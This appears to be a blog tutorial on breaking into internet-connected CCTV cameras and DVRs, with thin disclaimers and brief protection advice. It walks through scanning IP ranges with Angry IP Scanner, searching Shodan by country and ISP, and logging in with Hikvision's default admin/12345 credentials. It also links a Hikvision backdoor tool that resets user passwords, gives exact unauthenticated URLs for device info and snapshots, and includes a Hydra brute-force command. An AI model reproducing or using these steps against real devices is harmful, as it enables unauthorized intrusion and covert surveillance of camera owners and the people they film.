How to hack CCTV camera (for educational purpose)

Want to learn how to hack CCTV cameras? You are in the right place, but be aware that I'm writing this article to let you know what is possible to do and how you must protect your IP cameras to avoid them to be hacked.

DISCLAIMER: I'm not responsible for any of your acts. You don't suppose to hack CCTV cameras that don't belong to you. You've been warned.

OK, after this disclaimer, let's dive in into the information about IP cameras, and how they are hacked by malicious people on the Internet.

Hack CCTV camera

In this article I will explain step-by-step what are the methods used by hackers to get into in the IP cameras and recorders such as DVRs and NVRs.

Extra material about CCTV camera hacking

To have extra information about how to hack CCTV camera and how to protect yourself you can also read the following articles:

The methods to hack CCTV camera

There are different ways to hack CCTV camera, some of them are easy, others are a little bit more technical and some others are not even hacking.

Let's take a look at the following methods: 

1. Use a website that shows hacked CCTV cameras

This is not really hacking, but it's the easiest method. You just visit a website that list a lot of hacked CCTV cameras and you just need to watch them.

Those website are created by hackers that get into IP CCTV cameras or DVRs (Digital Video Recorders) and let the information available for you for free.

So, in the end of the day you are not hacking anything but just watching CCTV camera that have been hacked by somebody else.

See below an example of a website that show such hacked CCTV cameras:

The website lists CCTV hacked cameras around the world and organize them by manufacturers, countries, places, cities and timezone. 

See below an example of live CCTV cameras installed on malls.

Hacked CCTV cameras on Insecam.org

The website administrator claims that this The world's biggest directory of online surveillance security cameras and that no privacy of individuals will be respected by showing only filtered cameras (whatever this means).

According to a message in the main page, the CCTV camera can be removed from the site when somebody send an email asking for it.

2. Hack CCTV camera using default passwords

That's also not really a hacking but it works. You just need to find the CCTV camera online and try to use the default password, a lot of devices on the Internet are still using the same original password from the factory.

The idea is to look at the IP camera manual and look for the default password, so you can use it to hack the CCTV camera (or recorder).

How to find the IP camera on the Internet

OK, before you try the default password to hack CCTV camera you need to find them on Internet and there are different ways to do that, let's check the first method that uses a network IP scanner to find online IP devices.

In this article I will teach you how to use the Angry IP Scanner to scan the Internet and look for IP cameras and recorders (DVRs and NVRs)

STEP 1 - Download the Angry IP Scanner

Click here to download the Angry IP scanner for your Operational System: Windows, Mac or Linux.

See below the Angry IP Scanner website. Make sure you have Java installed and download the correct version for your computer.

Install ANgry IP Scanner to hack CCTV camera
STEP 2 - Install the Angry IP Scanner

The installation is very simple, you just need to run the setup file and follow the instructions as shown in the images below: (click to enlarge)

Angry IP Scanner Installation 01

Click Next

Angry IP Scanner Installation 02

Click Install

Angry IP Scanner Installation 03

Click Finish

STEP 3 - Configure the Angry IP Scanner ports and fetcher 

To be able to find the information we are looking for to hack IP cameras is necessary to configure the Angry IP Scanner ports and fetchers so it can display the right information. See the picture below for the configuration.

Angry IP Scanner Preference

Configure the ports 80, 23, 8080, 8081 and 8082 that are the most one used by people that install the IP cameras and let them available on the Internet.

Angry IP Scanner Port Configuration to hack CCTV camera

Configure the fetchers to display the Web Detect information that will show some device information that is useful to find out who is the manufacturer.

To hack a CCTV camera is really necessary to have such basic information

Go to tools and click on fetchers to open the configuration window

Angry IP Scanner fetchers

Select the Web detect fetcher on the right side and click the arrow to move it to the left side so it can be displayed in the software main page.

Angry IP Scanner Fetchers to hack CCTV camera
STEP 4 - Choose the IP port range to scan

To hack a CCTV camera first is necessary to find one that is available on the Internet, so you need to choose an IP Address range to scan with the Angry IP scanner. See the picture below where a range of IP address was scanned. 

IP Angry Scanner Results for Hikvision DVRs

You can use the IP range from your country or service provider, in the example above I used the range from xx.242.10.0 to xx.242.10.255. Note that you can fill the first part of the IP range and choose /24 or /16 for example to let the software find the range for you with 254 or 65.534 hosts respectively.

For privacy reasons the first part of the IP is not shown, after only few scans it's possible to find two Hikvision DVRs that are online on the Internet. I know that because of the Web detect information that shows DNVRS-Webs.

The scan can be done for thousand of IP addresses, so it's quite common to find a lot of IP cameras, DVRs and NVRs that are connected to the Internet.

After find an IP camera or DVR online you just need to right click and choose to open it on a Web Browser. Just like shown in the picture below. 

Angry IP Scanner Open in a Web Browser

In this case the device is a Hikvision DVR and you can just try to use the default user and password:  "admin/12345" found on Hikvision manual.

Hikvision DVR Login Screen

Note the manufacturer name (Hikvision) underneath the login screen. Sometimes you see a big logo and sometimes a small text just like this one.

Did you get the idea? To hack CCTV camera you just need to use a tool to scan the Internet, find an online device and try the default password you can get from the manufacturer manual or from a IP camera default password list.

Below the image from the DVR after login with the admin/12345 credentials.

Hikvision Hacked DVR

Hikvision hacked DVR (click to enlarge)

It's easier to show an example with this manufacturer (Hikvison) because there a lot of their devices around the world, but the process also works with other brands as long as you can see the Web Detect information and try to use the default admin/password credentials to hack the CCTV camera.

Hack CCTV camera process details

If you want to have extra information about how the CCTV camera hacking works just keep reading, it's important to understand the process so you can protect yourself against hackers trying to get into your IP security camera. 

How CCTV camera hack work diagram

How CCTV camera hacking work diagram (click to enlarge)

The network scanner (Angry IP scanner) is used to retrieve information from the router that is on Internet, Just like shown in the picture below:

How CCTV camera hack work diagram explanation

How to hack CCTV camera diagram (click to enlarge)

Be aware that this process is something natural, the router don't need to hide the information and will respond what are the services available.

We can compare the process with a regular store, the owner don't hide where is the location and what services are available, so people can come and use them. The owner just will not have the key store available for the public.

3. Hack CCTV camera using shodan

This technique to hack CCTV camera is very similar to the last one, but you don't need to install a software to scan the network, this process has already been done for you and you just need to try to use the login credentials.

Shodan is a service in a website that shows Internet devices around the world and that includes security IP cameras, DVRs and NVRs.

It's necessary just to type the brand of an IP camera or the manufacturer name and Shodan will you show a lot of information, which includes the number of devices around the world, the location, IP and open ports.

Take a look at the picture below and see how much information is available

Hack CCTV camera with Shodan

If you create a Free account on the site, Shodan let you to filter the information, see below an example where the information is filtered by country (Brazil) and take a look at the details which includes the number of cameras per city (São Paulo) and even the ISP provider (Vivo).

Using Shodan to hack CCTV camera

Shodan shows the details about the IP device

To see the IP device details just click in the details link and new windows will open to show all the information about the CCTV camera you want to hack.

Shodan Details

Details about the device location and owner

The details windows show the device IP and even the organization name

Shodan Device Details - IP and company

Details about the device ports

As we saw before, each IP device on the Internet has an IP and also some services available by using specific ports. Shodan can show these information very clearly as shown in the picture below.

Shodan Camera Details Port and Model

After see the details, you just need to use a Web Browser to type the IP device IP and port and try to use the default user and password just as described earlier in this article. See the picture below.

For this camera I just typed the IP and port like this: XX.226.219.250:88

DVR Login Screen

If you are lucky and the IP camera (or DVR) password has never been changed, you will be able to login by typing the default device password.

4. Hack CCTV camera using exploit tool (software)

So you want to hack CCTV camera but the default username and password was changed by somebody, so you can use a CCTV camera exploit tool.

When an IP device has some security problem, hackers can create exploit tools to automate the hacking process. That happens also with IP cameras.

The Hikvision IP camera security flaw

In March 2017 a security flaw was discovered in Hikvision IP cameras that allows direct access to device information such as model, serial number, firmware version, and users.

The problem was reported to Hikvision on March 6, 2017, which promptly investigated the problem and admitted the existence of the failure.

Five days later Hikvision released a fix for the problem, but cameras that are using the old firmware will still be vulnerable to this security flaw.

How the IP camera exploit works

Just as an example I will talk about a software created to exploit the security vulnerability on Hikvision IP cameras which are using old specific firmware. 

Hikvision IP camera exploit tool diagram

The Hikvision IP camera exploit tool

So, the Hikvision IP camera exploit is very easy to use, as show in the diagram above, you just need to run it on a computer or laptop to explorer and hack CCTV camera that is online on the Internet or in your local network.

Click the link below to download the Hikvision Backdoor exploit tool

Obviously, you need the IP camera information to be able to configure the software properly, and I strongly recommend that you use this tool on the Hikvision IP cameras you own or have authorization to run security tests. 

DISCLAIMER: I'm not responsible for any of your acts. You don't suppose to hack CCTV camera that doesn't belong to you. The Hikvision exploit tool can be used to test your IP cameras and make sure they have the security vulnerability corrected by firmware update. You've been warned.

OK, now that you know you don't suppose to be hacking other people IP cameras, let's talk about the Hikvision exploit tool. See the picture below.

Hikvision IP camera exploit tool

The exploit can hack CCTV camera by getting the IP camera internal user list and setting a new password for one of them according to your choice.

To use the software just follow the steps below:

1. Type the camera IP and port

2. Click "get user list"

3. Select the user to change the password

4. Type a new password and click the button 

Hikvision exploit tool to hack CCTV camera

After following these steps, you just need to type the camera IP and port on a Web Browser and login by using the credential you just created.

Cameras that are affected by the security vulnerability 

See below the Hikvision camera models that are affected by this security vulnerability issue. If you have one of them just upgrade the firmware to correct to problem so you don't have your CCTV camera hacked.

Hikvision camera affected firmware

5. Hack CCTV camera using a simple command

How to get the IP camera information

It's also possible to hack Hikvision camera by just sending a specific command that gets the camera information or take a screen shot. The same models and firmware version described above are affected by this issue.

If you type the camera IP and port followed by the command below you will see the camera details, such as device name, model and firmware version

System/deviceInfo?auth=YWRtaW46MTEK

So the complete command is: 

<camera IP>:<camera port> System/deviceInfo?auth=YWRtaW46MTEK

The camera returns the information just like shown in the image below:

<DeviceInfo xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">

<deviceName>IP CAMERA</deviceName>

<deviceID>88</deviceID>

<deviceDescription>IPCamera</deviceDescription>

<deviceLocation>hangzhou</deviceLocation>

<systemContact>Hikvision.China</systemContact>

<model>DS-2CD2420F-IW</model>

<serialNumber>DS-2CD2420F-IW20160920xxxxxxxxxx</serialNumber>

<macAddress>a4:14:37:xx:xx:xx</macAddress>

<firmwareVersion>V5.4.5</firmwareVersion>

<firmwareReleasedDate>build 170123</firmwareReleasedDate>

<bootVersion>V1.3.4</bootVersion>

<bootReleasedDate>100316</bootReleasedDate>

<hardwareVersion>0x0</hardwareVersion>

</DeviceInfo>

How to take a camera screenshot

Just by issuing a similar command it's possible to take the IP camera screenshot and see what is behind the CCTV camera. It's a security flaw.

See below the command to get the IP camera screenshot.

onvif-http/snapshot?auth=YWRtaW46MTEK

So the complete command is: 

<camera IP>:<camera port> onvif-http/snapshot?auth=YWRtaW46MTEK

After issue this command to the Hikvision IP camera the image below is displayed in the Web Browser without the need for authentication.

Hikvision camera exposed - Screenshot

Screenshot from a Hikvision IP camera (click to enlarge)

Disclaimer: The image above is from a Hikvision camera which was using an old firmware version as previously described in this article. The company has a fix for this issue so the new models don't have this security flaws.

6. Hack CCTV camera by brute force attack

Just imagine the CCTV camera is using a password that is based on a regular word that can be find on a dictionary such as "god, home, secret", etc

Somebody could get hack the CCTV camera by just trying different all those passwords until find the correct one. That is something that works.

Alright, you are thinking now that this method is too hard and slow since it's complicated to type any word that is available in a dictionary just to try to find the one that is going to work to login into the CCTV camera, right ?

Well, if you let this task to a software that can test hundreds or thousands passwords per minute you can have a better chance to succeed. 

Take a look at the diagram below to understand how this technique works.

Hack CCTV camera using Hydra for Linux

You can use Hydra for Linux or Windows and you just need to have your password file ready will the words you want to use and issue the command

hydra -s 88 -l admin -P /root/desktop/pass.txt -e ns  <camera IP>

See below the syntax

-s 88 -- the port number on the IP camera
-l admin -- default login name that will be used (admin)
-P /root/desktop/pass.txt -- your password list file
-e --- empty password
ns --- try login and empty password

Hack CCTV camera using Hydra

The software runs and start trying different words it gets from the txt file and keep doing this until there's a match. If the CCTV camera allows for those fast tries it's just a question of time to the software find the correct password.

Modern IP CCTV cameras don't allow this type of brute force attack because they block themselves for some time after too many login attempts. 

Final words and conclusion

There are different ways to hack CCTV camera and all of them involves at least some basic skills from the attacker that must be able to understand at least a little bit about Internet and how to use a computer and software.

Beware that any IP device that are connected to the Internet is at risk and there's no guarantee that it's 100% and can't be hacked by someone.

The idea behind this article is to help people to understand how a CCTV camera can be hacked and how to minimize the chances of an attacker.  

I used some example just to show what is possible to do and most of the techniques used by hackers can work with different devices.

Note: I'm not supporting any CCTV camera manufacturer or brand and I also don't recommend any attempt to hack into somebody else's camera.

Tags: , , , , , ,